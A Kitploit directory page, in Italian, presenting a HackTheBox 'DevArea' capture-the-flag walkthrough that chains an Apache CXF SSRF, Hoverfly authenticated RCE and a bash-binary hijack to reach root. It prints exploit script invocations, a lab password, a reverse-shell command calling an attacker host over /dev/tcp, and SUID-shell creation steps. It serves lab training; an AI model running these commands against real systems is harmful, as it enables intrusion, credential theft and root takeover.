Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
devarea — HackTheBox DevArea walkthrough che concatena CVE-2022-46364 Apache CXF SSRF, CVE-2025-54123 Hoverfly RCE e dirottamento di bash con SUID per l'escalation a root. | Kitploit
Strumenti/GitHubGitHub/ledksv/devarea
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e FormazioneRed TeamingLab e Pratica
GitHubledksv/devarea

devarea

HackTheBox DevArea walkthrough che concatena CVE-2022-46364 Apache CXF SSRF, CVE-2025-54123 Hoverfly RCE e dirottamento di bash con SUID per l'escalation a root.

2 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository

DevArea — HackTheBox

Piattaforma: HackTheBox OS: Linux Stato: Ritirata — walkthrough completa pubblicata.

Walkthrough completa: l3dsec.com/walkthroughs/devarea-htb


Catena di attacco

root@kitploit:~
nmap → 21 (FTP anon) + 80 + 8080 (Jetty) + 8888 (Hoverfly)
  → FTP anon → employee-service.jar (Apache CXF, pre-3.5.5)
    → CVE-2022-46364 SSRF → file:///etc/systemd/system/hoverfly.service
      → credenziali admin in ExecStart
        → CVE-2025-54123 Hoverfly RCE → shell come dev_ryan → user flag
          → /usr/bin/bash scrivibile da tutti + sudo syswatch.sh lo richiama
            → hijack di bash → rootbash SUID → root flag

1. Enumerazione

root@kitploit:~
nmap -sC -sV -p- <TARGET_IP>
# 21/tcp  open  ftp     vsftpd 3.0.5 (anonymous login)
# 8080/tcp open http    Jetty 9.4.27
# 8888/tcp open http    Hoverfly Dashboard

Il download FTP anonimo da pub/ restituisce employee-service.jar — servizio SOAP Apache CXF, versione inclusa precedente alla 3.5.5.


2. CVE-2022-46364 (Apache CXF SSRF → lettura credenziali)

CXF precedente alla 3.5.5 riflette gli URL href di XOP:Include lato server — lettura arbitraria di file tramite file://.

root@kitploit:~
python3 CVE-2022-46364.py -t http://devarea.htb:8080/employeeservice -s file:///etc/systemd/system/hoverfly.service -d devarea.htb
# ExecStart: hoverfly -add -username admin -password O7IJ27MyyXiU
# User=dev_ryan

3. CVE-2025-54123 (Hoverfly Authenticated RCE)

Hoverfly 1.11.3 — RCE autenticata tramite injection nella configurazione del middleware.

root@kitploit:~
nc -lvnp 4444
./CVE-2025-54123.sh -t http://<TARGET_IP>:8888 -u admin -p O7IJ27MyyXiU -c "bash -i >& /dev/tcp/<ATTACKER_IP>/4444 0>&1"

Shell come dev_ryan. User flag in /home/dev_ryan/user.txt.


4. Privilege Escalation — Hijacking del binario Bash

root@kitploit:~
sudo -l
# (root) NOPASSWD: /opt/syswatch/syswatch.sh
ls -la /usr/bin/bash
# -rwxrwxrwx  (scrivibile da tutti)

syswatch.sh richiama internamente /usr/bin/bash. Sostituirlo con uno script che rilascia SUID:

root@kitploit:~
cp /usr/bin/bash /tmp/bash.bak
printf '#!/tmp/bash.bak\ncp /tmp/bash.bak /tmp/rootbash\nchmod 4755 /tmp/rootbash\n' > /usr/bin/bash
chmod +x /usr/bin/bash
sudo /opt/syswatch/syswatch.sh status
/tmp/rootbash -p
# euid=0(root)

Root flag in /root/root.txt.


Flag

FlagValore
Userredacted
Rootredacted

Solo a scopo didattico. Testa esclusivamente sistemi di tua proprietà o per cui hai esplicita autorizzazione scritta.

Scarica lo strumento